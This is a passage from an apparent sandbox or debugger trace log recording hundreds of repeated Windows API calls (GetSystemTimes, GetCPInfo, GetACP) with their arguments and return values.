(in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.887] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.887] GetACP () returned 0x4e4 [0079.887] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.887] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.887] GetACP () returned 0x4e4 [0079.887] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.887] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.887] GetACP () returned 0x4e4 [0079.887] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.887] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.887] GetACP () returned 0x4e4 [0079.887] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.887] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.888] GetACP () returned 0x4e4 [0079.888] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.888] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.888] GetACP () returned 0x4e4 [0079.888] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.888] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.888] GetACP () returned 0x4e4 [0079.888] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.888] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.888] GetACP () returned 0x4e4 [0079.888] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.888] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.888] GetACP () returned 0x4e4 [0079.888] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.888] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.888] GetACP () returned 0x4e4 [0079.888] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.888] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.888] GetACP () returned 0x4e4 [0079.888] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.888] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.888] GetACP () returned 0x4e4 [0079.888] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.888] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.888] GetACP () returned 0x4e4 [0079.889] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.889] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.889] GetACP () returned 0x4e4 [0079.889] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.889] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.889] GetACP () returned 0x4e4 [0079.889] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.889] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.889] GetACP () returned 0x4e4 [0079.889] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.889] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.889] GetACP () returned 0x4e4 [0079.889] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.889] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.889] GetACP () returned 0x4e4 [0079.889] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.889] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.889] GetACP () returned 0x4e4 [0079.889] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.889] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.889] GetACP () returned 0x4e4 [0079.889] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.890] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.890] GetACP () returned 0x4e4 [0079.890] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.890] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.890] GetACP () returned 0x4e4 [0079.890] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.890] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.890] GetACP () returned 0x4e4 [0079.890] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.890] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.890] GetACP () returned 0x4e4 [0079.890] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.890] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.890] GetACP () returned 0x4e4 [0079.890] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.890] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.890] GetACP () returned 0x4e4 [0079.890] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.890] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.890] GetACP () returned 0x4e4 [0079.890] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.890] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.890] GetACP () returned 0x4e4 [0079.890] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.890] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.890] GetACP () returned 0x4e4 [0079.891] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.891] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.891] GetACP () returned 0x4e4 [0079.891] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.891] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.891] GetACP () returned 0x4e4 [0079.891] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.891] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.891] GetACP () returned 0x4e4 [0079.891] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.891] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.891] GetACP () returned 0x4e4 [0079.891] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.891] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.891] GetACP () returned 0x4e4 [0079.891] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.891] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.891] GetACP () returned 0x4e4 [0079.891] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.891] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.891] GetACP () returned 0x4e4 [0079.891] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.891] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.891] GetACP () returned 0x4e4 [0079.891] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.892] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.892] GetACP () returned 0x4e4 [0079.892] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.892] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.892] GetACP () returned 0x4e4 [0079.892] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.892] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.892] GetACP () returned 0x4e4 [0079.892] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.892] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.892] GetACP () returned 0x4e4 [0079.892] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.892] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.892] GetACP () returned 0x4e4 [0079.892] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.892] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.892] GetACP () returned 0x4e4 [0079.892] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.892] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.892] GetACP () returned 0x4e4 [0079.892] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.892] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.892] GetACP () returned 0x4e4 [0079.892] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.893] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.893] GetACP () returned 0x4e4 [0079.893] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.893] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.893] GetACP () returned 0x4e4 [0079.893] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.893] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.893] GetACP () returned 0x4e4 [0079.893] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.893] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.893] GetACP () returned 0x4e4 [0079.893] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.893] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.893] GetACP () returned 0x4e4 [0079.893] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.893] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.893] GetACP () returned 0x4e4 [0079.893] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.895] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.895] GetACP () returned 0x4e4 [0079.895] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.895] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.895] GetACP () returned 0x4e4 [0079.895] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.895] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.895] GetACP () returned 0x4e4 [0079.895] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0079.895] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0079.895] GetACP () returned 0x4e4 [0079.895] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.008] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.008] GetACP () returned 0x4e4 [0080.008] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.008] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.008] GetACP () returned 0x4e4 [0080.009] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.009] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.009] GetACP () returned 0x4e4 [0080.009] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.009] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.009] GetACP () returned 0x4e4 [0080.009] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.009] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.009] GetACP () returned 0x4e4 [0080.009] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.009] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.009] GetACP () returned 0x4e4 [0080.009] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.009] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.009] GetACP () returned 0x4e4 [0080.009] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.010] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.010] GetACP () returned 0x4e4 [0080.010] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.010] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.010] GetACP () returned 0x4e4 [0080.010] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.010] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.010] GetACP () returned 0x4e4 [0080.010] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.010] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.010] GetACP () returned 0x4e4 [0080.010] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.010] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.010] GetACP () returned 0x4e4 [0080.010] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.011] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.011] GetACP () returned 0x4e4 [0080.011] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.011] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.011] GetACP () returned 0x4e4 [0080.011] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.011] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.011] GetACP () returned 0x4e4 [0080.011] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.011] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.011] GetACP () returned 0x4e4 [0080.011] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.011] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.011] GetACP () returned 0x4e4 [0080.011] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.011] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.011] GetACP () returned 0x4e4 [0080.012] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.012] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.012] GetACP () returned 0x4e4 [0080.012] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.012] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.012] GetACP () returned 0x4e4 [0080.012] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, 